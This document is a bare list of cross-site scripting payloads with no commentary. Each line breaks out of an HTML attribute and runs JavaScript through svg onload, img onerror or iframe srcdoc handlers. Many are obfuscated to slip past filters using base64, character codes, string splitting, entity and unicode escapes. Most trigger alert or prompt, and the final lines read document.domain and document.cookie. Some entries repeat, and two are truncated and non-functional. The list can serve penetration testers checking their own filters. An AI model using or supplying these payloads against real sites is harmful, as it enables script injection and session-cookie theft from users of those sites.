"><svg/onload=alert(1)>
"><img src=x onerror=alert`1`>
"><svg onload=eval(atob('YWxlcnQoMSk='))>
"><svg onload=window >
"><svg onload=Function('alert(1)')()>
"><iframe srcdoc="<script>alert(1)</script>"></iframe>
"><svg onload=new Function('alert(1)')()>
"><svg/onload=(()=>alert(1))()>
"><img src=x onerror=confirm(1)>
"><svg onload=prompt`1`>
"><svg onload=eval(String.fromCharCode(97,108,101,114,116,40,49,41))>
"><svg onload=alert&#40;1&#41;>
"><svg onload=prompt&#40;1&#41;>
"><svg onload=confirm&#40;1&#41;>
"><svg onload=eval(atob('cHJvbXB0KDEp'))>
"><svg onload=eval(atob('YWxlcnQoMSk='))>
"><svg onload=eval`alert(1)`>
"><svg onload=window >
"><svg onload=eval(String.raw`alert(1)`)> 
"><svg onload=eval(String.raw`con\u0066irm(1)`)> 
"><svg onload=eval(String.raw`prompt(1)`)> 
"><svg onload="setTimeout('alert(1)',0)"> 
"><svg onload=eval('ale'+'rt(1)')> 
"><svg onload=eval('con'+'firm(1)')> 
"><svg onload=new Function('prompt(1)')()> 
"><svg onload="eval(decodeURIComponent('%61%6C%65%72%74(1)'))"> 
"><svg onload="eval(unescape('%61%6C%65%72%74(1)'))"> 
"><svg onload="eval(String.fromCharCode(112,114,111,109,112,116,40,49,41))"> 
"><svg onload=eval`alert\u0028document.domain\u0029`> 
"><svg onload=eval`prompt\u00281\u0029`> 
"><svg onload="(()=>eval('alert(1)'))()"> 
"><svg onload="()=>alert(1)"> 
"><svg onload="()=>prompt(1)"> 
"><svg onload="setTimeout('prompt(1)')"> 
"><svg onload="window['al'.concat('ert')](document.domain)"> 
"><svg onload="eval('alert'.concat('(document.domain)'))"> 
"><svg onload=eval(String.fromCharCode(97,108,101,114,116,40,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,41))> 
"><svg onload=window['al'.concat('ert')](document.cookie)> 
